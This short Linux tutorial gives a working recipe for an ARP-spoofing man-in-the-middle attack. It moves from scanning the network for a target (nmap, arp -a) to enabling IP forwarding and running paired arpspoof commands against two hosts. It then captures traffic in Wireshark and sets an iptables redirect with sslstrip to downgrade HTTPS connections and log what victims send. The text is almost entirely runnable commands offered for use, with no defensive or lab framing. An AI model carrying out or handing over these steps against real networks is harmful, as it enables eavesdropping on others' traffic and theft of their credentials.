[LINUX] ARP spoofing procedure (man-in-the-middle attack, MITM)

1. Obtain the IP address of the attack target

ifconfig
arp -a
nmap -F 192.168.XXX.XXX/24

etc.

2. Enable IP forwarding to forward packets through the attacker's PC

Set to 1 to enable:

echo 1 > /proc/sys/net/ipv4/ip_forward

Set to 0 to disable:

echo 0 > /proc/sys/net/ipv4/ip_forward

3. ARP table rewrite

Using wlan0 as the NIC, overwrite the MAC address recorded for 192.168.100.124 in the ARP table of 192.168.100.123 with the attacker's (your own) MAC address.

sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124

Using wlan0 as the NIC, overwrite the MAC address recorded for 192.168.100.123 in the ARP table of 192.168.100.124 with the attacker's (your own) MAC address.

sudo arpspoof -i wlan0 -t 192.168.100.124 192.168.100.123

Note: The two arpspoof commands must run at the same time, each in its own terminal, so that both sent and received traffic passes through the attacker's PC.

4. Packet capture

wireshark

5. sslstrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
cat sslstrip.log

